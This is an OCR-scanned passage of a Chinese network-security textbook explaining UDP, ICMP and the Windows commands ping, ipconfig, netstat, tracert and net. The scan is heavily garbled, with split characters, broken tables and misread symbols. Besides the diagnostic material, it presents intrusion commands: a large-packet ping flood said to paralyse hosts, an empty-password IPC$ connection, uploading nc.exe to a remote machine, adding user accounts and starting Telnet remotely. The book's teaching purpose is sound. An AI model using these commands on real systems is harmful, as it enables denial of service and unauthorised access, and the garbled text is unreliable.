只 提供 数据 的 不 可 靠 交 付 , 它 一 旦 把 应 用 程序 发 给 网 络 层 的 数据 发 送出 去 ,就 不 保留 数据 备 
份 ( 所 以 UDP 有 时 候 也 被 认为 是 不 可 靠 的 数据 报 协议 )。UDP 在 IP 数据 报 的 头 部 仅 加 入 
了 复 用 和 数据 校 验 ( 字 段 ) 。 由 于 缺乏 可 靠 性 ,UDP 应 用 一 般 必 须 允 许 一 定量 的 丢 包 、 出 错 
和 重 传 。 

常用 的 网 络 服务 中 ,域名 系统 (Domain Name System,DNS) 使 用 UDP。 当 用 户 在 应 用 
程序 中 输入 DNS 名 称 时 ,DNS 服务 可 以 将 此 名 称 解析 为 与 此 名 称 相关 的 IP 地 址 。 

某 些 程序 (比如 腾讯 的 QQ) 使 用 的 是 UDP,UDP 在 TCP/IP 主机 之 间 建 立 快速 轻便、 
不 可 靠 的 数据 传输 通道 ,UDP 的 结构 如 图 2-7 所 示 。 


JP 数据 报 


一 ~ 


IP 报 头 IP 有 效 负载 
UDP 消 息 


| 一 - 


UDP 报头 | 消息 


图 2-7 UDP 的 结构 


UDP 和 TCP 传递 数据 的 差异 : UDP 和 TCP 传递 数据 的 差异 类 似 于 电话 和 明信片 之 
间 的 差异 。 

TCP 就 像 电话 ,必须 先 验证 目标 是 否 可 以 访问 后 才 开 始 通信 。 

UDP 就 像 明 信 片 ,信息 量 很 小 而 且 每 次 传递 成 功 的 可 能 性 很 高 ,但 是 不 能 完全 保证 传 
递 成 功 。 

UDP 通常 由 每 次 传输 少量 数据 或 有 实时 需要 的 程序 使 用 。 在 这 些 情 况 下 ,UDP 的 低 
开销 比 TCP 更 适合 。 

UDP 的 头 结构 比较 简单 ,如 图 2-8 所 示 。 


源 端 口 (2B) 目的 端口 (2B) 
封包 长 度 (2B) 校 验 和 (2B) 
数据 


图 2-8 UDP 的 头 结构 

对 图 2-8 的 结构 说 明 如 下 。 

CD. 源 端口 (Source Port); 16 位 的 源 端 口 域 包含 初始 化 通信 的 端口 号 。 源 端口 和 IP. 
地 址 的 作用 是 标识 报 文 的 返回 地 址 。 

(2) 目的 端口 (Destination PorO : 6 位 的 目的 端口 域 定义 传输 的 目的 。 这 个 端口 指明 
报 文 接收 计算 机 上 的 应 用 程序 地 址 接口 。 

(3) 封包 长 度 (Length): UDP 头 和 数据 的 总 长 度 。 

(4) 校 验 和 (Checksum): 和 TCP 和 校 验 和 一 样 ,不 仅 对 头 数据 进行 校 验 ,还 对 包 的 内 
容 进行 校 验 。 

对 UDP 报头 的 分 析 如 图 2-9 所 示 , 从 图 中 可 以 看 出 DNS 服务 用 的 端口 是 UDP 的 53 
端口 ,具体 实验 步 请 参见 实验 4。 
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2.1.6 控制 消息 协议 ICMP 


ICMP 的 全 称 是 Internet Control Message Protocol。 从 技术 角度 来 说 ,ICMP 就 是 一 
个 “错误 侦 测 与 回报 机 制 ”, 其 目的 就 是 让 我 们 能 够 检测 网 路 的 连 线 状况 ， 也 能 确保 连 线 的 
准确 性 。 通 过 ICMP ,主机 和 路 由 器 可 以 报告 错误 并 交换 相关 的 状态 信息 。 

ICMP 提供 一 致 易 懂 的 出 错 报 告 信息 。 发 送 的 出 错 报 文 返回 到 发 送 原 数据 的 设备 , 因 
为 只 有 发 送 设备 才 是 出 错 报 文 的 逻辑 接收 者 。 发 送 设备 随后 可 根据 ICMP 报 文 确定 发 生 错 
误 的 类 型 ,并 确定 如 何 才 能 更 好 地 重 发 失败 的 数据 报 。 但 是 ICMP 唯一 的 功能 是 报告 问题 
而 不 是 纠正 错误 ,纠正 错误 的 任务 由 发 送 方 完成 。 

我 们 在 网 络 中 经 常会 使 用 到 ICMP ,比如 经 常 使 用 的 用 于 检查 网 络 通 不 通 的 ping 命令 
(Linux 和 Windows 中 均 有 ), 这 个 “ping” 的 过 程 实际 上 就 是 ICMP 工作 的 过 程 。 还 有 其 他 
的 网 络 命令 如 跟踪 路 由 的 Tracert 命令 也 是 基于 ICMP 的 。 

在 下 列 情况 中 ,通常 自动 发 送 ICMP 消息 : 这 些 控 制 消息 虽然 并 不 传输 用 户 数据 ,但 是 
对 于 用 户 数据 的 传递 起 着 重要 的 作用 。 

CD IP 数据 报 无 法 访问 目标 。 

(2) IP 路 由 器 (网 关 ) 无 法 按 当前 的 传输 速率 转发 数据 报 。 

(3) IP 路 由 器 将 发 送 主机 重 定向 为 使 用 更 好 的 到 达 目 标的 路 径 。 

ICMP 的 头 结构 比较 简单 ,如 图 2-10 所 示 。 

类 型 (8b) | 代码 (8b) 校 验 和 (16b) 
标识 符 | 序号 
数据 


2-10 ICMP 头 结构 


使 用 ping 命令 发 送 ICMP 回应 请 求 消息 ,可 以 检测 网 络 或 主机 通信 故障 并 解决 常见 的 
TCP/IP 连接 问题 。 分 析 ping 指令 的 数据 报 ,如 图 2-11 所 示 。 具 体 实验 步骤 参见 实验 5。 


[Normal end of "ICMP header".] 


2-11 ICMP 数据 报 
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从 图 2-11 看 出 ,类 型 为 8, 代码 为 0, 表示 查询 回 送 请 求 (ping 命令 请 求 )。 如 果 类 型 为 
0, 代 码 为 0, 表 示 查 询 回 送 应 答 (ping 命令 应 答 ) ,具体 的 ICMP 报 文 类 型 如 图 2-12 所 示 。 


类 型 R B 描 述 查 询 差 错 
0 0 回 显 应 答 z 

3 目的 不 可 达 ; 

0 网 络 不 可 达 

1 主机 不 可 达 

2 协议 不 可 达 = 

3 端口 不 可 达 

4 需要 进行 分 片 但 设置 了 不 分 片 比特 - 

5 源 站 选 路 失败 * 
6 
7 
8 
9 


目的 网 络 不 认识 - 

目的 主机 不 认识 

源 主 机 被 隔离 (作废 不 用 ) 所 

目的 网 络 被 强制 禁止 - 

10 目的 主机 被 强制 禁止 , 

11 由 于 服务 类 型 TOS, 网 络 不 可 达 - 

12 由 于 服务 类 型 TOS, 主 机 不 可 达 - 

13 由 于 过 滤 ,通信 被 强制 禁止 - 

14 主机 越权 = 

15 优先 权 中 止 生效 = 

4 0 源 端 被 关闭 E 
5 重 定向 
对 网 络 重 定向 
对 主机 重 定向 $ 
对 服务 类 型 和 网 络 重 定 向 - 
对 服务 类 型 和 主机 重 定向 - 
请 求 回 显 - 
路 由 器 通告 - 
路 由 器 请 求 a 
11 超时 ; 
0 传输 期 间 生存 时 间 为 0 

1 在 数据 报 组 装 期 间 生存 时 间 为 0 - 

12 参数 问题 
坏 的 IP 首部 (包括 各 种 差错 ) - 
缺少 必需 的 选项 
时 间 戳 请 求 - 
iL S - 
信息 请 求 ( 作 废 不 用 ) - 
信息 应 答 ( 作 废 不 用 ) 
地 址 掩 码 请 求 
地 址 掩 码 应答 


o ojoj w = = 


13 
14 
15 
16 
17 
18 


o ojo ojo ol- o 


图 2-12 ICMP 报 文 类 型 
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2.2 ”常用 的 网 络 命 令 


2.2.1 网 络 诊断 工具 ping 


ping 不 仅 是 Windows 下 的 命令 ,在 UNIX 和 Linux 下 也 有 这 个 命令 。ping 只 是 一 个 
通信 协议 ,是 TCP/IP 协议 的 一 部 分 ,ping 在 Windows 系统 下 是 自 带 的 一 个 可 执行 命令 。 
利用 它 可 以 检查 网 络 是 否 能 够 连通 ,用 好 它 可 以 帮助 我 们 分 析 判 定 网 络 故障 。 

应 用 格式 : ping IP 地 址 。 该 命令 还 可 以 加 入 许多 参数 使 用 ,具体 是 输入 ping 后 按 回 车 
键 即 可 看 到 详细 说 明 。 


2.2.2 ping 命令 参数 


下 面 参照 ping 命令 的 帮助 说 明 来 介绍 使 用 中 会 需要 的 技巧 ,ping 只 有 在 安装 了 TCP/ 
IP 以 后 才 可 以 使 用 。 

ping [ - t] [ -a] [ -n count] [ -1 length] [- f] [- itti][- v tos] [-rcount][- scout] [7 j 

computer — list] | [ - k computer - list] [ -w timeout] destination- list 

选项 

(1) -t Ping the specified host until stopped To see statistics and continue - type 
Control-Break; To stop - type Control-C. 

不 停 地 ping 对 方 主机 ,直到 按 下 Ctrl 十 C 键 。 

此 功能 没有 什么 特别 的 技巧 ,不 过 可 以 配合 其 他 参数 使 用 ,将 在 下 面 提 到 。 

(2) -a Resolve addresses to hostnames. 

解析 计算 机 的 NetBios 名 。 

示例 : 

C:\>ping -al192.168.1.21 

Pinging malimei [192.168.1.21] with 32 bytes of data: 

Reply from 192.168.1.21: bytes = 32 time < 10ms TTL = 254 

Reply from 192.168.1.21: bytes = 32 time < 10ms TTL = 254 

Reply from 192.168.1.21: bytes = 32 time < 10ms TTL = 254 

Reply from 192.168.1.21: bytes = 32 time < 10ms TTL = 254 

Ping statistics for 192.168.1.21: 

Packets: Sent = 4,Received = 4,Lost = 0 (0% loss), Approximate round trip times in milli- 

seconds: 

Minimum = Oms,Maximum = Oms, Average = Oms 


从 上 面 就 可 以 知道 IP Jy 192.168. 1. 21 的 计算 机 NetBios 名 为 malimei。 

(3) -n count Number of echo requests to send. 

发 送 count 指定 的 echo 数据 包 数 。 

在 默认 情况 下 ,一 般 都 只 发 送 4 个 数据 包 , 通 过 这 个 命令 可 以 自己 定义 发 送 的 个 数 , 对 
衡量 网 络 速度 很 有 帮助 ,比如 想 测试 发 送 50 个 数据 包 的 返回 的 平均 时 间 为 多 少 , 最 快 时 间 
为 多 少 , 最 慢 时 间 为 多 少 , 就 可 以 通过 以 下 命令 获知 。 
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C:V» ping -n 50 202.103.96.68 

Pinging 202.103.96.68 with 32 bytes of data: 

Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 
Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 
Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 
Request timed out. 


Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 

Reply from 202.103.96.68: bytes = 32 time = 50ms TTL = 241 

Ping statistics for 202.103.96.68: 

Packets: Sent = 50,Received = 48,Lost = 2 (4% loss), Approximate round trip times in milli- 

seconds: 

Minimum = 40ms,Maximum = 51ms,Average = 46ms 

从 以 上 就 可 以 知道 ,在 给 202. 103. 96. 68 A 3€ 50 个 数据 包 的 过 程 当中 ,返回 了 48 个 ， 
其 中 有 两 个 由 于 未 知 原因 丢失 ,这 48 个 数据 包 当 中 返回 速度 最 快 为 40ms, 最 慢 为 51ms, 平 
均 速 度 为 46ms。 

(4) -l size Send buffer size. 

定义 echo 数据 包 大 小 。 

在 默认 的 情况 下 , Windows 的 ping 发 送 的 数据 包 大 小 为 32B, 我 们 也 可 以 自己 定义 它 
的 大 小 ,但 有 一 个 大 小 的 限制 ,就 是 最 大 只 能 发 送 65 500B, 也 许 有 读者 会 问 为 什么 要 限制 
到 65 500B, 因 为 Windows 系列 的 系统 都 有 一 个 安全 漏洞 (也 许 还 包括 其 他 系统 ) 就 是 当 向 
对 方 一 次 发 送 的 数据 包 大 于 或 等 于 65 532 时 ,对 方 就 很 有 可 能 宕 机 ,所 以 微软 公司 为 解决 
这 一 安全 漏洞 限制 了 ping 的 数据 包 大 小 。 虽 然 微软 公司 已 经 做 了 此 限制 ,但 这 个 参数 配合 
其 他 参数 以 后 危害 依然 非常 强大 ,比如 可 以 通过 配合 一 t 参数 来 实现 一 个 带 有 攻击 性 的 命 
令 ( 以 下 介绍 带 有 危险 性 , 仅 用 于 试验 ,请 勿 轻易 施 于 别人 机 器 上 )。 

C:\>ping -1 65500 - t 192.168.1.21 

Pinging 192.168.1.21 with 65500 bytes of data: 


Reply from 192.168.1.21: bytes = 65500 time< 10ms TTL = 254 
Reply from 192.168.1.21: bytes = 65500 time < 10ms TTL = 254 


这 样 它 就 会 不 停 地 向 192. 168. 1. 21 计算 机 发 送 大 小 为 65 500B 的 数据 包 , 如 果 只 有 一 
台 计 算 机 也 许 没 有 什么 效果 ,但 如 果 有 很 多 计算 机 那么 就 可 以 使 对 方 完 全 瘫痪 ,假如 同时 使 
j 10 台 以 上 计算 机 ping 一 台 Windows 2000 Pro 系统 的 计算 机 时 ,不 到 5 SHINE 

已 经 完全 瘫痪 ,网 络 严 重 堵塞 ,HTTP 和 FTP 服务 完全 停止 ,由 此 可 见 威力 非 同 小 可 
E Windows 已 经 修复 此 漏洞 。 

(5) -f Set Don't Fragment flag in packet. 

在 数据 包 中 发 送 “ 不 要 分 段 ? 标 志 。 

一 般 所 发 送 的 数据 包 都 会 通过 路 由 分 段 再 发 送 给 对 方 ,加 上 此 参数 以 后 路 由 就 不 会 再 
分 段 处 理 。 

(6) -i TTL Time To Live. 

指定 TTL 值 在 对 方 的 系统 里 停留 的 时 间 。 

此 参数 同样 是 帮助 检查 网 络 运 转 情 况 的 。 
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(7) -v TOS Type Of Service. 

将 “服务 类 型 "字段 设置 为 TOS 指定 的 值 。 

(8) -r count Record route for count hops. 

在 “记录 路 由 ?字段 中 记录 传 出 和 返回 数据 包 的 路 由 。 

在 一 般 情况 下 发 送 的 数据 包 是 通过 一 个 个 路 由 才 到 达 对 方 的 ,但 到 底 是 经 过 了 哪些 路 
由 呢 ? 通过 此 参数 就 可 以 设 定 想 探测 经 过 的 路 由 的 个 数 , 不 过 限制 在 了 9 个 ,也 就 是 说 只 能 
跟踪 到 9 个 路 由 ,以 下 为 示例 。 

C:\>ping -nl -r 9 202.96.105.101 (发 送 一 个 数据 包 , 最 多 记录 9 个 路 由 ) 

Pinging 202.96.105.101 with 32 bytes of data: 

Reply from 202.96.105.101: bytes = 32 time = 10ms TTL = 249 

Route: 202.107.208.187 一 > 

202.107.210.214 一 > 

61.153.112.70 -» 

61.153.112.89 -» 

202.96.105.149 一 > 

202.96.105.97 一 > 

202.96.105.101 -> 

202.96.105.150 一 > 

61.153.112.90 

Ping statistics for 202.96.105.101: 

Packets: Sent = 1,Received = 1,Lost = 0 (0% loss), 

Approximate round trip times in milli- seconds: 

Minimum = 10ms,Maximum = 10ms,Average = 10ms 

从 上 面 就 可 以 知道 从 我 的 计算 机 到 202. 96. 105. 101 一 共通 过 了 202. 107. 208. 187. 
202. 107. 210. 214. 61. 153. 112. 70. 61. 153. 112. 89, 202. 96. 105. 149, 202. 96. 105. 97, 
202. 96. 105. 101,202. 96. 105. 150.61. 153. 112. 90 这 9 个 路 由 。 

(9) -j host-list Loose source route along host-list. 

利用 host-list 指定 的 计算 机 列表 路 由 数据 包 。 连 续 计 算 机 可 以 被 中 间 网 关 分 隔 (路 由 
稀 朴 源 )IP 允许 的 最 大 数量 为 9。 

(10) -k host-list Strict source route along host-list. 

利用 host-list 指定 的 计算 机 列表 路 由 数据 包 。 连 续 计 算 机 不 能 被 中 间 网 关 分 隔 ( 路 由 
严格 源 )IP 允许 的 最 大 数量 为 9。 

(11) -w timeout Timeout in milliseconds to wait for each reply. 

指定 超时 间隔 ,单位 为 mm。 此 参数 没有 什么 其 他 技巧 。 

(12) 在 Windows 7 中 ,-4 强行 使 用 IPv4,-6 强行 使 用 IPv6, 在 局 域 网 中 知道 对 方 主机 
名 字 就 可 知道 它们 的 IPv4 地 址 和 IPv6 地 址 了 。 

(13) ping 命令 的 其 他 技巧 : 在 一 般 情况 下 还 可 以 通过 ping 对 方 让 对 方 返 回 给 你 的 
TTL 值 大 小 ,粗略 地 判断 目标 主机 的 系统 类 型 是 Windows 系列 还 是 UNIX/Linux 系列 。 
一 般 情况 下 ,Windows 系列 的 系统 返回 的 TTL 值 在 100 一 130 之 间 , 而 UNIX/Linux 系列 
的 系统 返回 的 TTL 值 在 240—255 之 间 。 

当然 TTL 的 值 在 对 方 的 主机 里 是 可 以 修改 的 ,Windows 系列 的 系统 可 以 通过 修改 注 
册 表 以 下 键 值 来 实现 。 
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[HKEY_LOCAL_MACHINE\ sys tem\CurrentControlSet\Services\Tcpip\Parameters] 

"DefaultTTL" = dword:000000FF 

255 —- FF, 128 ——- 80,64 ——- 40,32 -——- 20 

Ping 是 一 个 使 用 频率 极 高 的 网 络 诊断 程序 ,用 于 确定 本 地 主机 是 否 能 与 另 一 台 主 机 交 
换 (发 送 与 接收 ) 数 据 包 。 根 据 返 回 的 信息 ,就 可 以 推断 TCP/IP 参数 是 否 设置 得 正确 以 及 
运行 是 否 正常 。 需 要 注意 的 是 : 成 功 地 与 男 一 台 主 机 进行 一 次 或 两 次 数据 报 交 换 并 不 表示 
TCP/IP 配置 就 是 正确 的 ,必须 执行 大 量 的 本 地 主机 与 远程 主机 的 数据 报 交换 ,才能 确信 
TCP/IP 的 正确 性 。 


2.2.3 网 络 诊断 工具 ipconfig 


ipconfig 指令 显示 所 有 TCP/IP 网 络 配置 信息 、 刷 新 动态 主机 配置 协议 (Dynamic Host 
Configuration Protocol,DHCP) 和 域名 系统 (DNS) 设 置 。 
使 用 不 带 参 数 的 ipconfig 可 以 显示 所 有 适配器 的 TP 地 址 、 子 网 掩 码 和 默认 网 关 。 


1. ipconfig 命令 参数 


ipconfig /all: 显示 本 机 TCP/IP 配置 的 详细 信息 。 

ipconfig /release: DHCP 客户 端 手工 释放 IP 地 址 。 
ipconfig /renew: DHCP 客户 端 手工 向 服务 器 刷新 请 求 。 
ipconfig /flushdns: 清除 本 地 DNS 缓存 内 容 。 

ipconfig /displaydns: 显示 本 地 DNS 内 容 。 

ipconfig /registerdns: DNS 客户 端 手工 向 服务 器 进行 注册 。 
ipconfig /showclassid: 显示 网 络 适配器 的 DHCP 类 别 信息 。 
ipconfig /setclassid: 设置 网 络 适配器 的 DHCP 类 别 。 


2. ipconfig 命令 举例 
在 “运行 "对话 框 中 输入 “cmd” 打 开 DOS 窗口 。 
在 盘 符 提示 符 后 输入 “ipconfig /all” 后 回 车 。 


Windows IP Configuration 【windows IP 配置 】 

Host Name . . . . . . . . . . . . :PCNAME 【 域 中 计算 机 名 、 主 机 名 】 

Primary Dns Suffix. ......: [x DNs 后 级 】 

We Type. 2 ace 4 eec Unknown 【 结 点 类 型 】 

IP Routing Enabled. . . . . . . .: No 【IP 路 由 服务 是 否 启用 】 

WINS Proxy Enabled. . . . . . . . : No [uus 代理 服务 是 否 启用 】 

Ethernet adapter : 【本 地 连接 】 

Connection - specific DNS Suffix: 【连接 特定 的 DNS 后 缀 】 

Description. . . . . . . . . . . : Realtek RIL8168/8111 PCI- E Gigabit 【网 卡 型 号 描述 】 

Physical Address. . . . . . . . .: 00- 1D- 7D- 71 - A8 - D6 【网 卡 MAC 地 址 】 

DHCPEnabled. ,s,s sss No 【动态 主机 设置 协议 是 否 
启用 】 

IP Address. . . . . . . . . . . . : 192.168.90.114 【IP 地 址 】 

Subnet Nask. s.. a > = s :255.255.,255.0 【 子 网 掩 码 】 

Default Gateway . . . . . . . . . : 192.168.90.254 【默认 网 关 】 

DHCP Server. |... . . . : 192.168.90.88 【DacP 管理 者 计算 机 IP] 

DNS Servers. . . . . . . . . . . : 221.5.88.88 [DNS 服务 器 地 址 】 
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Lease Obtained. . . . . . . . . .: 2011 年 4 月 1 号 8: 13: 54 【IP 地 址 租用 开始 时 间 】 
Lease Expires. . . . . . . . . . : 2011 年 4 月 10 号 8: 13: 54 【IP 地 址 租用 结束 时 间 】 


2.2.4 netstat 命令 


netstat 指令 显示 活动 的 连接 、 计 算 机 监听 的 端口 、 以 太 网 统计 信息 、IP 路 由 表 、IPv4 统 
HAS AP, ICMP, TCP 和 UDP) ,使 用 “netstat -an” 命 令 可 以 查看 目前 活动 的 连接 和 开放 
的 端口 ,是 网 络 管理 员 查 看 网 络 是 否 被 入 侵 的 最 简单 方法 。 使 用 的 方法 如 下 所 示 。 


C:\Documents and Settings\Administrator > netstat -an 


Proto Local Address Foreign Address State 

TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 
TCP 127.0.0.1:1027 0.0.0.0:0 LISTENING 
TCP 192.168.1.2:139 0.0.0.0:0 LISTENING 
TCP 192.168.1.2:2532 220.181.132.154:80 ESTABLISHED 
TCP 192.168.1.2:3186 220.181.111.161:80 CLOSE WAIT 
TCP 192.168.1.2:3187 220.181.111.148:80 CLOSE WAIT 
TCP 192.168.1.2:3188 124.238.238.119:80 CLOSE WAIT 
TCP 192.168.1.2:3190 180.149.132.165:80 CLOSE WAIT 
TCP 192.168.1.2:3216 220.181.111.148:80 CLOSE WAIT 
TCP 192.168.1.2:3228 180.149.131.170:80 CLOSE WAIT 
TCP 192.168.1.2:3242 180.149.131.88:80 CLOSE WAIT 
TCP 192.168.1.2:3247 220.181.112.75:80 CLOSE WAIT 
TCP 192.168.1.2:3252 220.181.112.75:80 CLOSE WAIT 
TCP 192.168.1.2:3260 220.181.164.53:80 CLOSE WAIT 
TCP 192.168.1.2:3266 220.181.111.115:80 CLOSE WAIT 
TCP 192.168.81.1:139 0.0.0.0:0 LISTENING 
TCP 192.168.126.1:139 0.0.0.0:0 LISTENING 


LISTENING: 侦 听 来 自 远 方 的 TCP 端口 的 连接 请 求 。 
ESTABLISHED: 代表 一 个 打开 的 连接 。 
CLOSE-WAIT: 等 待 从 本 地 用 户 发 来 的 连接 中 断 请 求 。 
netstat 命令 参数 一 般 格式 为 : 


C:\>netstat /? 
显示 协议 统计 信息 和 当前 TCP/IP 网 络 连接 。 
netstat [Ca] [-b] [-e] [-n] [-0] [ -p proto] [ - r] [-s] [-v] 


-a 显示 所 有 连接 和 监听 端口 。 

-b 显示 包含 于 创建 每 个 连接 或 监听 端口 的 可 执行 组 件 。 在 某 些 情况 下 已 知 可 执行 组 
件 拥有 多 个 独立 组 件 , 并 且 在 这 些 情况 下 包含 于 创建 连接 或 监听 端口 的 组 件 序列 被 显示 。 

-e 显示 以 太 网 统计 信息 。 此 选项 可 以 与 -s 选项 组 合 使 用 。 

-n 以 数字 形式 显示 地 址 和 端口 号 。 此 选项 可 以 与 -a 选项 组 合 使 用 。 

-o 显示 与 每 个 连接 相关 的 所 属 进程 ID。 

-p proto 显示 proto 指定 的 协议 的 连接 ,proto 可 以 是 下 列 协议 之 一 : TCP, UDP. 
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TCPv6 或 UDPv6 WR 5j-s 选项 一 起 使 用 以 显示 按 协议 统计 信息 ,proto 可 以 是 下 列 协议 
之 一 : IP,IPv6,ICMP,ICMPv6,TCP,TCPv6,UDP 或 UDPv6 。 

-r 显示 路 由 表 。 

-s 显示 按 协 议 统计 信息 。 默 认 地 ,显示 IP,IPv6,ICMP,ICMPv6,TCP,TCPv6,UDP 
和 UDPv6 的 统计 信息 。 

-p 选项 用 于 指定 默认 情况 的 子 集 。 

-v 与 -b 选项 一 起 使 用 时 将 显示 包含 于 为 所 有 可 执行 组 件 创建 连接 或 监听 端口 的 组 件 。 

interval 重新 显示 选 定 统计 信息 ,每 次 显示 之 间 暂 停 时 间 间 隔 ( 以 s 计 )。 按 Ctrl 十 C 键 
停止 重新 显示 统计 信息 。 如 果 省 略 ,netstat 显示 当前 配置 信息 (只 显示 一 次 ) 。 


2.2.5 Tracert 命令 


Tracert 为 路 由 跟踪 程序 ,用 于 确定 本 地 主机 到 目标 主机 经 过 哪些 路 由 结 点 。 在 Linux 
操作 系统 中 ,对 应 的 命令 为 Traceroute。Tracert 为 Windows 系统 下 的 命令 。Tracert 是 利 
H ICMP 和 TTL 进行 工作 的 。 首 先 Tracert 会 发 出 TTL 值 为 1 的 ICMP 数据 报 ( 包 含 
40B, 包 括 源 地 址 .目标 地 址 和 发 出 的 时 间 标 签 ,一 般 会 连续 发 三 个 包 ) 。 当 到 达 路 径 上 的 第 
一 个 路 由 器 时 ,路 由 器 会 将 TTL 值 减 1, 此 时 TTL 值 变 成 0 ,该 路 由 器 会 将 此 数据 报 丢弃 ， 
并 返回 一 个 超时 回应 数据 报 (包括 数据 报 的 源 地 址 ,内容 和 路 由 器 的 IP 地 址 ) 。 

其 命令 格式 如 下 : 


tracert [ - d] [ - h maximum hops] [ - j computer— list] [ -w timeout] target name. 


-d 指定 不 将 地 址 解析 为 计算 机 名 。 

-h maximum_hops 指定 搜索 目标 的 最 大 跃 点 数 。 

-j host-list 与 主机 列表 一 起 的 松散 源 路 由 ( 仅 适 用 于 IPv4) ,指定 沿 host-list ff) fiii iit i 
路 由 列表 序 进 行 转发 。host-list 是 以 空格 隔 开 的 多 个 路 由 器 IP 地 址 ,最 多 9 个 。 

-w timeonut 等 待 每 个 回复 的 超时 时 间 ( 以 ms 为 单位 ) 。 

-R 跟踪 往返 行程 路 径 ( 仅 适 用 于 IPv6) 。 

-S srcaddr 要 使 用 的 源 地 址 ( 仅 适 用 于 IPv6) 。 

-4 强制 使 用 IPv4。 

-6 强制 使 用 IPv6 。 

如 要 打开 www. qq. com, 经 过 的 路 由 如 图 2-13 所 示 ,由 于 安全 考虑 , 当 跟 踪 路 由 时 , 显 
示 请 求 超时 。 
2.2.6 ”net 命令 

net 命令 是 网 络 命令 中 最 重要 的 一 个 ,必须 透彻 掌握 它 的 每 一 个 子 命令 的 用 法 ,因为 它 
的 功能 实在 是 太 强大 了 。 首 先 来 看 一 看 它 都 有 哪些 子 命令 ,在 命令 窗口 中 输入 “net/?” 回 车 
即 可 ,本 节 重 点 掌握 几 个 入 侵 常 用 的 子 命令 ,具体 使 用 步骤 参见 实验 6。 

1. net view 

使 用 此 命令 查看 远程 主机 的 共享 资源 。 

命令 格式 为 net view \\IP, 如 图 2-14 所 示 , 查 看 IP 地 址 下 的 共享 文件 和 文件 夹 。 
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[C:\Documents and Settings hdministrator>tracert www.qq.con 


[Iracing route to www.qq.com [123.151.148.111] 
lover a maximum of 30 hop 


192.168.3.1 
18.8.134.1 
27.129.3.117? 
27.129.1.25 
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-222.194 
-52.250 
-88.106 
timed out. 
timed out. 
timed out. 


a 


3 
[EE 


F] 


图 2-13 路 由 跟踪 


Media disconnected 


C: NDocuments and Settings Mdministrator)net view \\192.168.1.2 
在 NW192.168.1.2 RIH: 


使 用 为 ”注释 


[C:\Documents and Settings Admini: 


A 2-14 net view 显示 共享 资源 

2. net use 

把 远程 主机 的 某 个 共 源 映射 为 本 地 盘 符 ,命令 格式 为 net use x: \\IP\sharename， 
如 图 2-15 所 示 .18 192. 168. 1.2 下 的 共享 名 为 malimei 的 目录 映射 为 本 地 的 Z 盘 ,显示 Z 
盘 的 内 容 , 就 是 显示 malimei 目录 下 的 内 容 。 

与 远程 计算 机 建立 信任 连接 ,命令 格式 为 net use WIPMPC $ password /user: name, 
如 图 2-16 所 示 ,表示 与 192. 168. 1. 2 建立 信任 连接 ,密码 为 空 ,用 户 名 为 administrator。 
立 了 IPC$ 连接 后 ,就 可 以 上 传 文件 了 : copy nc. exe \\192. 168. 1. 2\ipc$ ,如 图 2-17 所 示 ， 


*» 
3 
t 
+ 
3 
x 
l 
e 
x 
Es 
x 
D 
E 
s 


NN192.168.1.2\nalinei 


中 的 卷 是 文档 
序列 号 是 0802-EA22 


Zz:、 的 目录 


<DIR> 
<DIR> .. 
<DIR> ， 36BU 盘 保镖 隔离 的 文 
306,176 981 -ppt 
14,926,336 @02.ppt 
5,897,216 983 -ppt 
531,456 BOIndex.ppt 


图 2-15 net use 共享 资源 映射 为 本 地 盘 符 


程 主机 ,结合 后 面 要 介绍 到 的 其 他 命令 就 可 能 达到 入 侵 


表示 把 本 地 目录 下 的 nc. exe f£ 
的 效果 


TIEET EF 16.897 ELA Li 
178 个 文件 3.817.779.008 FP 
38 个 目录 28.395,368,448 可 用 字 节 
所 :> 
ESTE 


[C:\Documents and Settings Adninistrator net use w192.168.1.2*ipc$ /user: 


and Settings Adninistrator mnet use NX192.168.1.2*ipc$ /ut 


53192.168.1.2Nipc$ 
IPC 

OK 

a 

1 


Ic: NDocunents and Settings fdninistrator?, 


图 2-16 net use 建立 信任 连接 


net user 的 其 他 命令 如 下 。 
查看 和 账户 有 关 的 情况 ,包括 新 建 账 户 .删除 账户 、 查 看 特定 账户 、 激 活 账 户 、 账 户 禁 用 
等 。 这 对 人 侵 是 很 有 利 的 ,最 重要 的 , 它 为 克隆 账户 提供 了 前 提 。 输 入 不 带 参数 的 net 
user, 可 以 查看 所 有 用 户 , 包 括 已 经 禁用 的 
net user abcd 1234 /add ,新 建 一 个 用 户 名 为 abcd, 密 码 为 1234 的 账户 ,默认 为 user 组 


C: NDocunents and Settings Mdninistrator>dir 
a c HAE Win XP 
| 号 是 D4B3-DBBE 


NDocuments and Settings\Adninistrator 的 目录 


2014-01-26 19: <DIR> 
2014-01-26 19: <DIR> A 
<DIR> AppData 
<DIR> Favorites 
<DIR> Funshion 
691 funshion.ini 
<DIR> My Documents 
9 nc -exe 
<DIR> [开始 」 菜单 
<DIR> 
字 节 
修 目 录 34.919 .9843.972 可 用 字 节 
[C:\Documents and Settings\AdninistratorYcopy nc-exe \\192.168.1.5\ipc$ 


已 复制 个 文件 。 


|C: Documents and SettingsNhdministrator》 


2-17 ”建立 信任 连接 后 上 传 文件 


net user abcd /del, 将 用 户 名 为 abcd 的 用 户 删除 

net user abcd /active:no, 将 用 户 名 为 abcd 的 用 户 禁 用 。 

net user abcd /active:yes, 激 活用 户 名 为 abcd 的 用 户 

net user abcd, 查 看 用 户 名 为 abcd 的 用 户 的 情况 

3. net start 

使 用 它 来 启动 远程 主机 上 的 服务 。 和 远程 主机 建立 连接 后 ,如 果 发 现 它 的 什么 服务 没 
有 启动 ,而 又 想 使 用 此 服务 ,就 可 以 使 用 这 个 命令 来 启动 

用 法 : net start servername, servername 是 要 启动 的 服务 名 字 , 如 果 要 启动 Telnet 服 
成 功 启动 了 Telnet 服务 ,如 图 2-18 所 示 


务 ,应 为 net start telnet， 


trator?net start telnet 


[C:\Documents and Settings Admin 


入 网 络 安全 技术 与 实 CT C: MINDOWSY 


Æ 2-18 AZ) Telnet 服务 
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4. net stop 

入 侵 后 发 现 远 程 主 机 的 某 个 服务 不 需要 了 ,利用 这 个 命令 停 掉 就 可 以 了 ,用 法 和 net 
Start 相同 。 

5. net localgroup 


